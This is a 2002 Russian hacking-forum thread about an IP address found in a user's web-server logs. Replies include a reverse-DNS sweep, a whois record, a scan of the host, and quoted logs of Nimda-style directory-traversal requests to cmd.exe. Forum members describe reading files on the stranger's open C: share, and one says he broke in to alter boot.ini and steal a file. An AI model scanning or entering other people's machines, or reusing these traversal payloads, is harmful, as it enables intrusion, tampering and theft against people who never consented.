информационная безопасность
без паники и всерьез
 подробно о проектеRambler's Top100 		Портрет посетителяАтака на InternetSpanning Tree Protocol: недокументированное применение
BugTraq.Ru
 Русский BugTraq
 Анализ криптографических сетевых... 
 Модель надежности двухузлового... 
 Специальные марковские модели надежности... 
 Бэкдор в xz/liblzma, предназначенный... 
 Три миллиона электронных замков... 
 Doom на газонокосилках 
главная обзор RSN блог библиотека закон бред форум dnet о проекте
bugtraq.ru / форум / hacking
Имя Пароль
ФОРУМ
если вы видите этот текст, отключите в настройках форума использование JavaScript
регистрация





Легенда:
  новое сообщение
  закрытая нитка
  новое сообщение
  в закрытой нитке
  старое сообщение
  • Напоминаю, что масса вопросов по функционированию форума снимается после прочтения его описания.
  • Новичкам также крайне полезно ознакомиться с данным документом.
сенкс, прошу прощения за тупость 03.04.02 11:24  Число просмотров: 915
Автор: Kulsha Статус: Незарегистрированный пользователь
<"чистая" ссылка> <обсуждение закрыто>
<hacking>
217.34.152.89 02.04.02 14:34  
Автор: Kulsha Статус: Незарегистрированный пользователь
<"чистая" ссылка> <обсуждение закрыто>
это чего за ip ?
ктонить встречал его раньше? его может ктонить просканировать ради интереса?
217.34.152.89 03.04.02 11:27  
Автор: ih8u <i hate you> Статус: Member
<"чистая" ссылка> <обсуждение закрыто>
217.34.152.1 - host217-34-152-1.in-addr.btopenworld.com
217.34.152.0 - host217-34-152-0.in-addr.btopenworld.com
217.34.152.4 - host217-34-152-4.in-addr.btopenworld.com
217.34.152.2 - host217-34-152-2.in-addr.btopenworld.com
217.34.152.3 - host217-34-152-3.in-addr.btopenworld.com
217.34.152.6 - host217-34-152-6.in-addr.btopenworld.com
217.34.152.5 - host217-34-152-5.in-addr.btopenworld.com
217.34.152.8 - host217-34-152-8.in-addr.btopenworld.com
217.34.152.7 - host217-34-152-7.in-addr.btopenworld.com
217.34.152.9 - host217-34-152-9.in-addr.btopenworld.com
217.34.152.11 - host217-34-152-11.in-addr.btopenworld.com
217.34.152.10 - host217-34-152-10.in-addr.btopenworld.com
217.34.152.12 - host217-34-152-12.in-addr.btopenworld.com
217.34.152.14 - host217-34-152-14.in-addr.btopenworld.com
217.34.152.13 - host217-34-152-13.in-addr.btopenworld.com
217.34.152.16 - host217-34-152-16.in-addr.btopenworld.com
217.34.152.15 - host217-34-152-15.in-addr.btopenworld.com
217.34.152.18 - host217-34-152-18.in-addr.btopenworld.com
217.34.152.17 - host217-34-152-17.in-addr.btopenworld.com
217.34.152.19 - host217-34-152-19.in-addr.btopenworld.com
217.34.152.21 - host217-34-152-21.in-addr.btopenworld.com
217.34.152.20 - host217-34-152-20.in-addr.btopenworld.com
217.34.152.22 - host217-34-152-22.in-addr.btopenworld.com
217.34.152.24 - host217-34-152-24.in-addr.btopenworld.com
217.34.152.23 - host217-34-152-23.in-addr.btopenworld.com
217.34.152.26 - host217-34-152-26.in-addr.btopenworld.com
217.34.152.25 - host217-34-152-25.in-addr.btopenworld.com
217.34.152.27 - host217-34-152-27.in-addr.btopenworld.com
217.34.152.28 - host217-34-152-28.in-addr.btopenworld.com
217.34.152.29 - host217-34-152-29.in-addr.btopenworld.com
217.34.152.31 - host217-34-152-31.in-addr.btopenworld.com
217.34.152.30 - host217-34-152-30.in-addr.btopenworld.com
217.34.152.32 - host217-34-152-32.in-addr.btopenworld.com
217.34.152.34 - host217-34-152-34.in-addr.btopenworld.com
217.34.152.33 - host217-34-152-33.in-addr.btopenworld.com
217.34.152.36 - host217-34-152-36.in-addr.btopenworld.com
217.34.152.35 - host217-34-152-35.in-addr.btopenworld.com
217.34.152.37 - host217-34-152-37.in-addr.btopenworld.com
217.34.152.38 - host217-34-152-38.in-addr.btopenworld.com
217.34.152.39 - host217-34-152-39.in-addr.btopenworld.com
217.34.152.41 - host217-34-152-41.in-addr.btopenworld.com
217.34.152.40 - host217-34-152-40.in-addr.btopenworld.com
217.34.152.42 - host217-34-152-42.in-addr.btopenworld.com
217.34.152.44 - host217-34-152-44.in-addr.btopenworld.com
217.34.152.43 - host217-34-152-43.in-addr.btopenworld.com
217.34.152.46 - host217-34-152-46.in-addr.btopenworld.com
217.34.152.45 - host217-34-152-45.in-addr.btopenworld.com
217.34.152.47 - host217-34-152-47.in-addr.btopenworld.com
217.34.152.48 - host217-34-152-48.in-addr.btopenworld.com
217.34.152.49 - host217-34-152-49.in-addr.btopenworld.com
217.34.152.51 - host217-34-152-51.in-addr.btopenworld.com
217.34.152.50 - host217-34-152-50.in-addr.btopenworld.com
217.34.152.52 - host217-34-152-52.in-addr.btopenworld.com
217.34.152.54 - host217-34-152-54.in-addr.btopenworld.com
217.34.152.53 - host217-34-152-53.in-addr.btopenworld.com
217.34.152.56 - host217-34-152-56.in-addr.btopenworld.com
217.34.152.55 - host217-34-152-55.in-addr.btopenworld.com
217.34.152.57 - host217-34-152-57.in-addr.btopenworld.com
217.34.152.58 - host217-34-152-58.in-addr.btopenworld.com
217.34.152.59 - host217-34-152-59.in-addr.btopenworld.com
217.34.152.61 - host217-34-152-61.in-addr.btopenworld.com
217.34.152.60 - host217-34-152-60.in-addr.btopenworld.com
217.34.152.62 - host217-34-152-62.in-addr.btopenworld.com
217.34.152.64 - host217-34-152-64.in-addr.btopenworld.com
217.34.152.63 - host217-34-152-63.in-addr.btopenworld.com
217.34.152.66 - host217-34-152-66.in-addr.btopenworld.com
217.34.152.65 - host217-34-152-65.in-addr.btopenworld.com
217.34.152.67 - host217-34-152-67.in-addr.btopenworld.com
217.34.152.68 - host217-34-152-68.in-addr.btopenworld.com
217.34.152.69 - host217-34-152-69.in-addr.btopenworld.com
217.34.152.71 - host217-34-152-71.in-addr.btopenworld.com
217.34.152.70 - host217-34-152-70.in-addr.btopenworld.com
217.34.152.72 - host217-34-152-72.in-addr.btopenworld.com
217.34.152.74 - host217-34-152-74.in-addr.btopenworld.com
217.34.152.73 - host217-34-152-73.in-addr.btopenworld.com
217.34.152.76 - host217-34-152-76.in-addr.btopenworld.com
217.34.152.75 - host217-34-152-75.in-addr.btopenworld.com
217.34.152.77 - host217-34-152-77.in-addr.btopenworld.com
217.34.152.78 - host217-34-152-78.in-addr.btopenworld.com
217.34.152.79 - host217-34-152-79.in-addr.btopenworld.com
217.34.152.81 - host217-34-152-81.in-addr.btopenworld.com
217.34.152.82 - host217-34-152-82.in-addr.btopenworld.com
217.34.152.80 - host217-34-152-80.in-addr.btopenworld.com
217.34.152.84 - host217-34-152-84.in-addr.btopenworld.com
217.34.152.83 - host217-34-152-83.in-addr.btopenworld.com
217.34.152.86 - host217-34-152-86.in-addr.btopenworld.com
217.34.152.85 - host217-34-152-85.in-addr.btopenworld.com
217.34.152.87 - host217-34-152-87.in-addr.btopenworld.com
217.34.152.88 - host217-34-152-88.in-addr.btopenworld.com
217.34.152.89 - host217-34-152-89.in-addr.btopenworld.com
217.34.152.91 - host217-34-152-91.in-addr.btopenworld.com
217.34.152.90 - host217-34-152-90.in-addr.btopenworld.com
217.34.152.92 - host217-34-152-92.in-addr.btopenworld.com
217.34.152.94 - host217-34-152-94.in-addr.btopenworld.com
217.34.152.93 - host217-34-152-93.in-addr.btopenworld.com
217.34.152.96 - host217-34-152-96.in-addr.btopenworld.com
217.34.152.95 - host217-34-152-95.in-addr.btopenworld.com
217.34.152.97 - host217-34-152-97.in-addr.btopenworld.com
217.34.152.98 - host217-34-152-98.in-addr.btopenworld.com
217.34.152.99 - host217-34-152-99.in-addr.btopenworld.com
217.34.152.101 - host217-34-152-101.in-addr.btopenworld.com
217.34.152.100 - host217-34-152-100.in-addr.btopenworld.com
217.34.152.102 - host217-34-152-102.in-addr.btopenworld.com
217.34.152.104 - host217-34-152-104.in-addr.btopenworld.com
217.34.152.103 - host217-34-152-103.in-addr.btopenworld.com
217.34.152.106 - host217-34-152-106.in-addr.btopenworld.com
217.34.152.105 - host217-34-152-105.in-addr.btopenworld.com
217.34.152.107 - host217-34-152-107.in-addr.btopenworld.com
217.34.152.108 - host217-34-152-108.in-addr.btopenworld.com
217.34.152.109 - host217-34-152-109.in-addr.btopenworld.com
217.34.152.111 - host217-34-152-111.in-addr.btopenworld.com
217.34.152.110 - host217-34-152-110.in-addr.btopenworld.com
217.34.152.112 - host217-34-152-112.in-addr.btopenworld.com
217.34.152.114 - host217-34-152-114.in-addr.btopenworld.com
217.34.152.116 - host217-34-152-116.in-addr.btopenworld.com
217.34.152.113 - host217-34-152-113.in-addr.btopenworld.com
217.34.152.115 - host217-34-152-115.in-addr.btopenworld.com
217.34.152.117 - host217-34-152-117.in-addr.btopenworld.com
217.34.152.118 - host217-34-152-118.in-addr.btopenworld.com
217.34.152.119 - host217-34-152-119.in-addr.btopenworld.com
217.34.152.121 - host217-34-152-121.in-addr.btopenworld.com
217.34.152.120 - host217-34-152-120.in-addr.btopenworld.com
217.34.152.124 - host217-34-152-124.in-addr.btopenworld.com
217.34.152.122 - host217-34-152-122.in-addr.btopenworld.com
217.34.152.126 - host217-34-152-126.in-addr.btopenworld.com
217.34.152.123 - host217-34-152-123.in-addr.btopenworld.com
217.34.152.127 - host217-34-152-127.in-addr.btopenworld.com
217.34.152.125 - host217-34-152-125.in-addr.btopenworld.com
217.34.152.128 - host217-34-152-128.in-addr.btopenworld.com
217.34.152.129 - host217-34-152-129.in-addr.btopenworld.com
217.34.152.131 - host217-34-152-131.in-addr.btopenworld.com
217.34.152.130 - host217-34-152-130.in-addr.btopenworld.com
217.34.152.134 - host217-34-152-134.in-addr.btopenworld.com
217.34.152.132 - host217-34-152-132.in-addr.btopenworld.com
217.34.152.136 - host217-34-152-136.in-addr.btopenworld.com
217.34.152.133 - host217-34-152-133.in-addr.btopenworld.com
217.34.152.137 - host217-34-152-137.in-addr.btopenworld.com
217.34.152.135 - host217-34-152-135.in-addr.btopenworld.com
217.34.152.139 - host217-34-152-139.in-addr.btopenworld.com
217.34.152.138 - host217-34-152-138.in-addr.btopenworld.com
217.34.152.141 - host217-34-152-141.in-addr.btopenworld.com
217.34.152.140 - host217-34-152-140.in-addr.btopenworld.com
217.34.152.144 - host217-34-152-144.in-addr.btopenworld.com
217.34.152.142 - host217-34-152-142.in-addr.btopenworld.com
217.34.152.146 - host217-34-152-146.in-addr.btopenworld.com
217.34.152.143 - host217-34-152-143.in-addr.btopenworld.com
217.34.152.145 - host217-34-152-145.in-addr.btopenworld.com
217.34.152.147 - host217-34-152-147.in-addr.btopenworld.com
217.34.152.149 - host217-34-152-149.in-addr.btopenworld.com
217.34.152.148 - host217-34-152-148.in-addr.btopenworld.com
217.34.152.151 - host217-34-152-151.in-addr.btopenworld.com
217.34.152.150 - host217-34-152-150.in-addr.btopenworld.com
217.34.152.154 - host217-34-152-154.in-addr.btopenworld.com
217.34.152.152 - host217-34-152-152.in-addr.btopenworld.com
217.34.152.156 - host217-34-152-156.in-addr.btopenworld.com
217.34.152.153 - host217-34-152-153.in-addr.btopenworld.com
217.34.152.155 - host217-34-152-155.in-addr.btopenworld.com
217.34.152.157 - host217-34-152-157.in-addr.btopenworld.com
217.34.152.159 - host217-34-152-159.in-addr.btopenworld.com
217.34.152.158 - host217-34-152-158.in-addr.btopenworld.com
217.34.152.161 - host217-34-152-161.in-addr.btopenworld.com
217.34.152.160 - host217-34-152-160.in-addr.btopenworld.com
217.34.152.164 - host217-34-152-164.in-addr.btopenworld.com
217.34.152.162 - host217-34-152-162.in-addr.btopenworld.com
217.34.152.166 - host217-34-152-166.in-addr.btopenworld.com
217.34.152.163 - host217-34-152-163.in-addr.btopenworld.com
217.34.152.165 - host217-34-152-165.in-addr.btopenworld.com
217.34.152.167 - host217-34-152-167.in-addr.btopenworld.com
217.34.152.169 - host217-34-152-169.in-addr.btopenworld.com
217.34.152.168 - host217-34-152-168.in-addr.btopenworld.com
217.34.152.171 - host217-34-152-171.in-addr.btopenworld.com
217.34.152.170 - host217-34-152-170.in-addr.btopenworld.com
217.34.152.174 - host217-34-152-174.in-addr.btopenworld.com
217.34.152.172 - host217-34-152-172.in-addr.btopenworld.com
217.34.152.176 - host217-34-152-176.in-addr.btopenworld.com
217.34.152.173 - host217-34-152-173.in-addr.btopenworld.com
217.34.152.175 - host217-34-152-175.in-addr.btopenworld.com
217.34.152.177 - host217-34-152-177.in-addr.btopenworld.com
217.34.152.179 - host217-34-152-179.in-addr.btopenworld.com
217.34.152.178 - host217-34-152-178.in-addr.btopenworld.com
217.34.152.181 - host217-34-152-181.in-addr.btopenworld.com
217.34.152.180 - host217-34-152-180.in-addr.btopenworld.com
217.34.152.184 - host217-34-152-184.in-addr.btopenworld.com
217.34.152.182 - host217-34-152-182.in-addr.btopenworld.com
217.34.152.186 - host217-34-152-186.in-addr.btopenworld.com
217.34.152.183 - host217-34-152-183.in-addr.btopenworld.com
217.34.152.185 - host217-34-152-185.in-addr.btopenworld.com
217.34.152.187 - host217-34-152-187.in-addr.btopenworld.com
217.34.152.196 - host217-34-152-196.in-addr.btopenworld.com
217.34.152.189 - host217-34-152-189.in-addr.btopenworld.com
217.34.152.193 - host217-34-152-193.in-addr.btopenworld.com
217.34.152.188 - host217-34-152-188.in-addr.btopenworld.com
217.34.152.191 - host217-34-152-191.in-addr.btopenworld.com
217.34.152.190 - host217-34-152-190.in-addr.btopenworld.com
217.34.152.194 - host217-34-152-194.in-addr.btopenworld.com
217.34.152.192 - host217-34-152-192.in-addr.btopenworld.com
217.34.152.195 - host217-34-152-195.in-addr.btopenworld.com
217.34.152.197 - host217-34-152-197.in-addr.btopenworld.com
217.34.152.199 - host217-34-152-199.in-addr.btopenworld.com
217.34.152.206 - host217-34-152-206.in-addr.btopenworld.com
217.34.152.203 - host217-34-152-203.in-addr.btopenworld.com
217.34.152.198 - host217-34-152-198.in-addr.btopenworld.com
217.34.152.201 - host217-34-152-201.in-addr.btopenworld.com
217.34.152.202 - host217-34-152-202.in-addr.btopenworld.com
217.34.152.204 - host217-34-152-204.in-addr.btopenworld.com
217.34.152.200 - host217-34-152-200.in-addr.btopenworld.com
217.34.152.205 - host217-34-152-205.in-addr.btopenworld.com
217.34.152.207 - host217-34-152-207.in-addr.btopenworld.com
217.34.152.209 - host217-34-152-209.in-addr.btopenworld.com
217.34.152.216 - host217-34-152-216.in-addr.btopenworld.com
217.34.152.213 - host217-34-152-213.in-addr.btopenworld.com
217.34.152.208 - host217-34-152-208.in-addr.btopenworld.com
217.34.152.211 - host217-34-152-211.in-addr.btopenworld.com
217.34.152.212 - host217-34-152-212.in-addr.btopenworld.com
217.34.152.214 - host217-34-152-214.in-addr.btopenworld.com
217.34.152.210 - host217-34-152-210.in-addr.btopenworld.com
217.34.152.215 - host217-34-152-215.in-addr.btopenworld.com
217.34.152.217 - host217-34-152-217.in-addr.btopenworld.com
217.34.152.219 - host217-34-152-219.in-addr.btopenworld.com
217.34.152.226 - host217-34-152-226.in-addr.btopenworld.com
217.34.152.223 - host217-34-152-223.in-addr.btopenworld.com
217.34.152.218 - host217-34-152-218.in-addr.btopenworld.com
217.34.152.221 - host217-34-152-221.in-addr.btopenworld.com
217.34.152.222 - host217-34-152-222.in-addr.btopenworld.com
217.34.152.224 - host217-34-152-224.in-addr.btopenworld.com
217.34.152.220 - host217-34-152-220.in-addr.btopenworld.com
217.34.152.225 - host217-34-152-225.in-addr.btopenworld.com
217.34.152.227 - host217-34-152-227.in-addr.btopenworld.com
217.34.152.229 - host217-34-152-229.in-addr.btopenworld.com
217.34.152.236 - host217-34-152-236.in-addr.btopenworld.com
217.34.152.233 - host217-34-152-233.in-addr.btopenworld.com
217.34.152.228 - host217-34-152-228.in-addr.btopenworld.com
217.34.152.231 - host217-34-152-231.in-addr.btopenworld.com
217.34.152.232 - host217-34-152-232.in-addr.btopenworld.com
217.34.152.234 - host217-34-152-234.in-addr.btopenworld.com
217.34.152.230 - host217-34-152-230.in-addr.btopenworld.com
217.34.152.235 - host217-34-152-235.in-addr.btopenworld.com
217.34.152.237 - host217-34-152-237.in-addr.btopenworld.com
217.34.152.239 - host217-34-152-239.in-addr.btopenworld.com
217.34.152.246 - host217-34-152-246.in-addr.btopenworld.com
217.34.152.243 - host217-34-152-243.in-addr.btopenworld.com
217.34.152.238 - host217-34-152-238.in-addr.btopenworld.com
217.34.152.241 - host217-34-152-241.in-addr.btopenworld.com
217.34.152.242 - host217-34-152-242.in-addr.btopenworld.com
217.34.152.244 - host217-34-152-244.in-addr.btopenworld.com
217.34.152.240 - host217-34-152-240.in-addr.btopenworld.com
217.34.152.245 - host217-34-152-245.in-addr.btopenworld.com
217.34.152.247 - host217-34-152-247.in-addr.btopenworld.com
217.34.152.254 - host217-34-152-254.in-addr.btopenworld.com
217.34.152.249 - host217-34-152-249.in-addr.btopenworld.com
217.34.152.253 - host217-34-152-253.in-addr.btopenworld.com
217.34.152.248 - host217-34-152-248.in-addr.btopenworld.com
217.34.152.251 - host217-34-152-251.in-addr.btopenworld.com
217.34.152.252 - host217-34-152-252.in-addr.btopenworld.com
217.34.152.250 - host217-34-152-250.in-addr.btopenworld.com
217.34.152.255 - host217-34-152-255.in-addr.btopenworld.com
Инфа о 217.34.152.89 02.04.02 16:16  
Автор: Renkvil <Boris> Статус: Member
Отредактировано 02.04.02 18:21  Количество правок: 1
<"чистая" ссылка> <обсуждение закрыто>
> это чего за ip ?

Во Whois же было ясно написано:
inetnum: 217.32.0.0 - 217.47.255.255
netname: UK-BT-20000920
descr: BT Public Internet Service
descr: Provider Local Registry
country: GB
...
descr: BT Public Internet Service

Pool английского провайдера.
Возможно и даже очень, что IP динамический.

> ктонить встречал его раньше? его может ктонить
> просканировать ради интереса?

А что ты сам не сканируешь?
И как ты на него вышел?

Порты
135
139
445
1025
5000

W2K или XP
boot.ini сказал что Windows XP Home Edition

Диск С и ещё одна папка расшарены...

Вообщем в лучших традициях Windows...
посмотрел логи 03.04.02 07:59  
Автор: Kulsha Статус: Незарегистрированный пользователь
<"чистая" ссылка> <обсуждение закрыто>
виндового апача, и вижу следующее:
217.34.152.89 - - [02/Apr/2002:15:47:23 +0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 266
217.34.152.89 - - [02/Apr/2002:15:47:24 +0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
217.34.152.89 - - [02/Apr/2002:15:47:24 +0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
217.34.152.89 - - [02/Apr/2002:15:47:25 +0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
217.34.152.89 - - [02/Apr/2002:15:47:26 +0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
217.34.152.89 - - [02/Apr/2002:15:47:26 +0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
217.34.152.89 - - [02/Apr/2002:15:47:27 +0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
217.34.152.89 - - [02/Apr/2002:15:47:28 +0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
217.34.152.89 - - [02/Apr/2002:15:47:29 +0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
217.34.152.89 - - [02/Apr/2002:15:47:29 +0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
217.34.152.89 - - [02/Apr/2002:15:47:30 +0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
217.34.152.89 - - [02/Apr/2002:15:47:31 +0500] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 348
217.34.152.89 - - [02/Apr/2002:15:47:31 +0500] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 348
217.34.152.89 - - [02/Apr/2002:15:47:32 +0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266
217.34.152.89 - - [02/Apr/2002:15:47:33 +0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 266


а до этого на серваке похожий лог был, вот мне и стало интересно кто енто
О, господи! ;) 03.04.02 10:07  
Автор: iddqd <Юрий> Статус: Member
<"чистая" ссылка> <обсуждение закрыто>
Неужели есть человек, кому Нимда до сих пор не гадила в логи ;))))
ну вернее.. 03.04.02 10:39  
Автор: Kulsha Статус: Незарегистрированный пользователь
<"чистая" ссылка> <обсуждение закрыто>
я понял что это вирус , но нет у меня его на компе.....
ну вернее.. 03.04.02 11:08  
Автор: iddqd <Юрий> Статус: Member
<"чистая" ссылка> <обсуждение закрыто>
> я понял что это вирус , но нет у меня его на компе.....
Я разве сказал, что он у тебя на компе?

Короче, объясняю, чтоб не было больше вопросов:
Те урлы, что ты видел в логах - любимые мелкософтовские дыры (доступ предосталяет IIS), через которые осуществляется удаленное выполнение команд на машине жертвы и, соответственно, ее заражение. Нимда, тупо перебирает подсеть и ломится в каждую включеную машину, независимо от оси и веб-стервера, работающих на ней.

З.Ы. Прошу больше не задавать вопросов, итак все разжевал.
сенкс, прошу прощения за тупость 03.04.02 11:24  
Автор: Kulsha Статус: Незарегистрированный пользователь
<"чистая" ссылка> <обсуждение закрыто>
енто ты про что?! 03.04.02 10:33  
Автор: Kulsha Статус: Незарегистрированный пользователь
<"чистая" ссылка> <обсуждение закрыто>
Whois 02.04.02 14:54  
Автор: Glory <Mr. Glory> Статус: Elderman
<"чистая" ссылка> <обсуждение закрыто>
% This is the RIPE Whois server.
% The objects are in RPSL format.
% Please visit http://www.ripe.net/rpsl for more information.
% Rights restricted by copyright.
% See http://www.ripe.net/ripencc/pub-services/db/copyright.html

inetnum: 217.32.0.0 - 217.47.255.255
netname: UK-BT-20000920
descr: BT Public Internet Service
descr: Provider Local Registry
country: GB
admin-c: FLS15-RIPE
tech-c: FLS15-RIPE
tech-c: CS940-RIPE
tech-c: DT1144-RIPE
tech-c: AT4485-RIPE
tech-c: OR2288-RIPE
status: ALLOCATED PA
mnt-by: RIPE-NCC-HM-MNT
mnt-lower: BTNET-MNT
mnt-routes: BTNET-MNT
changed: hostmaster@ripe.net 20000920
changed: hostmaster@ripe.net 20001113
changed: hostmaster@ripe.net 20010620
changed: lir-help@ripe.net 20011214
source: RIPE

route: 217.32.0.0/12
descr: BT Public Internet Service
origin: AS2856
remarks: Please send abuse notification to abuse@bt.net
remarks: PLEASE DIRECT ALL QUERIES TO support@bt.net
mnt-by: BTNET-MNT
changed: Jas.Gill@bt.net 20000921
source: RIPE

role: FIRST LINE SUPPORT
address: pp GB1J
address: Alexander Graham Bell House
address: 1 Lochside View
address: Edinburgh Park
address: Edinburgh
address: Midlothian
address: EH12 9DH
address: GB
phone: +44 131 345 6577
fax-no: +44 131 345 8704
e-mail: gary.turnbull@bt.com
trouble: 1st Line Support
admin-c: GT4879-RIPE
tech-c: GT4879-RIPE
nic-hdl: FLS15-RIPE
mnt-by: BTNET-MNT
changed: preston.dialip@bt.com 20001108
changed: preston.dialip@bt.com 20010607
changed: gary.turnbull@bt.com 20020209
source: RIPE

person: Clive Stones
address: A3010 Westside
address: London Road
address: Apsley
address: Hemel Hempstead
address: HP3 9YF
phone: +44 1442 29 4591
e-mail: ipmaster@bt.com
nic-hdl: CS940-RIPE
notify: Tony.Arora@bt.net
changed: Tony.Arora@bt.net 19971001
changed: ipmaster@bt.com 20010705
source: RIPE

person: Dave Trickett
address: A3010 Westside
address: London Road
address: Apsley
address: Hemel Hempstead
address: HP3 9YF
phone: +44 1442 29 4563
e-mail: ipmaster@bt.com
nic-hdl: DT1144-RIPE
changed: ipmaster@bt.net 19990910
changed: ipmaster@bt.com 20010705
source: RIPE

person: Allen Turner
address: Room 205 pp C
address: Telephone Exchange
address: 176-184 Moor Lane
address: Preston
address: Lancashire
address: PR1 1BA
address: UK
phone: +44 1772 267836
fax-no: +44 1772 886263
e-mail: preston.dialip@bt.com
nic-hdl: AT4485-RIPE
changed: support@bt.net 20000531
changed: preston.dialip@bt.com 20010911
source: RIPE

person: Olwen Ross
address: Room 205 pp C
address: Telephone Exchange
address: 176-184 Moor Lane
address: Preston
address: Lancashire
address: PR1 1BA
address: UK
phone: +44 1772 267841
fax-no: +44 1772 886263
e-mail: preston.dialip@bt.com
nic-hdl: OR2288-RIPE
changed: preston.dialip@bt.com 20010524
changed: preston.dialip@bt.com 20010911
source: RIPE


Открыт 139 порт.
но это... 02.04.02 14:56  
Автор: Kulsha Статус: Незарегистрированный пользователь
<"чистая" ссылка> <обсуждение закрыто>
похоже провайдер который выкупил целую сетку....... а вот этот ip могет быть и диалаповским?? или нет?
...юзер, подконнекченный к вышеуказанному прову. 02.04.02 15:59  
Автор: Glory <Mr. Glory> Статус: Elderman
<"чистая" ссылка> <обсуждение закрыто>
> похоже провайдер который выкупил целую сетку....... а вот
> этот ip могет быть и диалаповским?? или нет?
может.
У него C: расшарен с полным доступом. Ща залез, решил ему boot.ini подправить и файла спиздить какого-нить. 8))).
1

Rambler's Top100
Рейтинг@Mail.ru


  Copyright © 2001-2024 Dmitry Leonov   Page build time: 0 s   Design: Vadim Derkach